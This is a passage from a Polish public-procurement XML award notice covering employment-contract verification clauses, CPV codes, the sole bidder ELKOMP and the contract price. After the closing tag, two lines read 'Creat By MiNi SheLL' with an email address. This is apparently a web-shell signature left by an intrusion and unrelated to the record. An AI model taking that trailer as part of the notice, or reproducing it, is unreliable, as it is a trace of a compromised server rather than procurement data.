wykonywania czynności kontrolnych wobec wykonawcy odnośnie
spełniania przez wykonawcę lub podwykonawcę wymogu zatrudnienia
na podstawie umowy o pracę osób wykonujących wskazane czynności.
Zamawiający uprawniony jest w szczególności do: a) żądania
oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww.
wymogów i dokonywania ich oceny, b) żądania wyjaśnień w przypadku
wątpliwości w zakresie potwierdzenia spełniania ww. wymogów, c)
przeprowadzania kontroli na miejscu wykonywania świadczenia. 32. W
trakcie realizacji zamówienia na każde wezwanie zamawiającego w
wyznaczonym w tym wezwaniu terminie wykonawca przedłoży
zamawiającemu wskazane poniżej dowody w celu potwierdzenia
spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez
wykonawcę lub podwykonawcę osób wykonujących wskazane czynności
w trakcie realizacji zamówienia: a) oświadczenie wykonawcy lub
podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób
wykonujących czynności, których dotyczy wezwanie zamawiającego.
Oświadczenie to powinno zawierać w szczególności: dokładne określenie
podmiotu składającego oświadczenie, datę złożenia oświadczenia,
wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione
na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób,
rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej
do złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy; b)
poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę
lub podwykonawcę kopię umowy/umów o pracę osób wykonujących w
trakcie realizacji zamówienia czynności, których dotyczy ww.
oświadczenie wykonawcy lub podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia
umowy/umów powinna zostać zanonimizowana w sposób
zapewniający ochronę danych osobowych pracowników, zgodnie z
przepisami ustawy z dnia 29 sierpnia 1997r. o ochronie danych
osobowych (tj. w szczególności bez imion, nazwisk, adresów, nr
PESEL pracowników). Informacje takie jak: data zawarcia umowy,
rodzaj umowy o pracę i wymiar etatu powinny być możliwe do
zidentyfikowania; c) zaświadczenie właściwego oddziału ZUS,
potwierdzające opłacanie przez wykonawcę lub podwykonawcę
składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia
na podstawie umów o pracę za ostatni okres rozliczeniowy; d)
poświadczoną za zgodność z oryginałem odpowiednio przez
wykonawcę lub podwykonawcę kopię dowodu potwierdzającego
zgłoszenie pracownika przez pracodawcę do ubezpieczeń,
zanonimizowaną w sposób zapewniający ochronę danych osobowych
pracowników, zgodnie z. 33. W przypadku uzasadnionych wątpliwości
co do przestrzegania prawa pracy przez wykonawcę lub
podwykonawcę, zamawiający może zwrócić się o przeprowadzenie
kontroli przez Państwową Inspekcję Pracy. 34. Klauzula dotycząca
zatrudnienia na podstawie umowy o pracę – art. 29 ust. 3a ustawy Pzp
– stanowi załącznik nr 10 do SIWZ. 35. Wykonawca złoży
Zamawiającemu oświadczenie (art. 29 ust. 3a) wg. treści Załącznika
Nr 10a do SIWZ.</przedmiot_zam><czy_podzielone_na_czesci>N</czy_podzielone_na_czesci><cpv1c>50700000-2</cpv1c><cpv2c>50711000-2</cpv2c><cpv3c>50720000-8</cpv3c><cpv4c>50721000-5</cpv4c><kod_val /><waluta></waluta><kod_trybu>PN</kod_trybu><czy_dotyczy_zakonczenia_dynamicznego /><informacje_dodatkowe_procedura></informacje_dodatkowe_procedura><czesci><cz_0><wykonawcy><wykonawca_0><nazwa_wyk>P.H.U. "ELKOMP" Jarosław Marciniak</nazwa_wyk><adres>ul. Górna 13, Rataje</adres><miejsc>Chodzież</miejsc><kod>64-800</kod><wojew /><wojewodztwo>wielkopolskie</wojewodztwo><wykonawca_email></wykonawca_email><skrot_panstwo_nie_ue></skrot_panstwo_nie_ue><skrot_panstwo_ue></skrot_panstwo_ue><czy_wykonawca_jest_msp /><czy_wykonawca_jest_z_ue /><czy_wykonawca_jest_z_nie_ue /></wykonawca_0></wykonawcy><data_zam>31/01/2017</data_zam><szacunkowa_wartosc_zamowienia_calkowita>125600.00</szacunkowa_wartosc_zamowienia_calkowita><podstawa_przyczyna_uniewaznienia></podstawa_przyczyna_uniewaznienia><czy_postepowanie_uniewazniono>N</czy_postepowanie_uniewazniono><waluta_zamowienia>PLN</waluta_zamowienia><waluta_inna></waluta_inna><liczba_ofert>1</liczba_ofert><liczba_otrzymanych_ofert_msp>1</liczba_otrzymanych_ofert_msp><liczba_otrzymanych_ofert_ue>0</liczba_otrzymanych_ofert_ue><liczba_otrzymanych_ofert_nie_ue>0</liczba_otrzymanych_ofert_nie_ue><liczba_otrzymanych_ofert_elektronicznych>0</liczba_otrzymanych_ofert_elektronicznych><liczba_odrzuconych_ofert>0</liczba_odrzuconych_ofert><czy_zamowienie_udzielone_wykonawcom /><cena>137679.00 </cena><cena_min>137679.00</cena_min><cena_max>137679.00</cena_max><kod_wal /><waluta /><waluta_inna_zamowienie>PLN</waluta_inna_zamowienie><informacje_dodatkowe_podwykonawca></informacje_dodatkowe_podwykonawca><wartosc_procentowa_czesci_zamowienia></wartosc_procentowa_czesci_zamowienia><czy_wykonawca_przewiduje_powierzenie>T</czy_wykonawca_przewiduje_powierzenie><nazwa></nazwa><nr_czesci_1></nr_czesci_1><wartosc></wartosc></cz_0></czesci><zal_pprawna /><tryb_podstawa_prawna></tryb_podstawa_prawna><art_podstawa_prawna></art_podstawa_prawna><zal_uzasadnienie></zal_uzasadnienie></ZP-403>

Creat By MiNi SheLL
Email: jattceo@gmail.com